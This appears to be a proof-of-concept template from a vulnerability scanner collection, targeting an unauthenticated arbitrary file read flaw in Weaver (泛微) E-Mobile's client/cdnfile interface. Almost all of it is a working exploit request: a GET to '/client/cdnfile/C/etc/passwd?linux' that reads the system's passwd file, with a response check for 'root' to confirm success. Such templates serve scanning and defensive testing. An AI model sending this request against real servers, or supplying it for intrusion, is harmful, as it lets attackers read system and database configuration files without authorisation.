Poc_Scanner/poc/OA-Poc/EMobile-cdnfile-ReadFile.yaml
2024-10-09 15:15:50 +08:00

30 lines
1.2 KiB
YAML

keyword: E-Mobile
name: 泛微E-Mobile任意文件读取漏洞
description: | # 下一行可填写漏洞描述
泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞
requests: # 为空代表默认或者不启用
path: "/client/cdnfile/C/etc/passwd?linux"
method: GET
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
body-raw: |- # 如果需要发送请求体,在下一行开始填写
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等。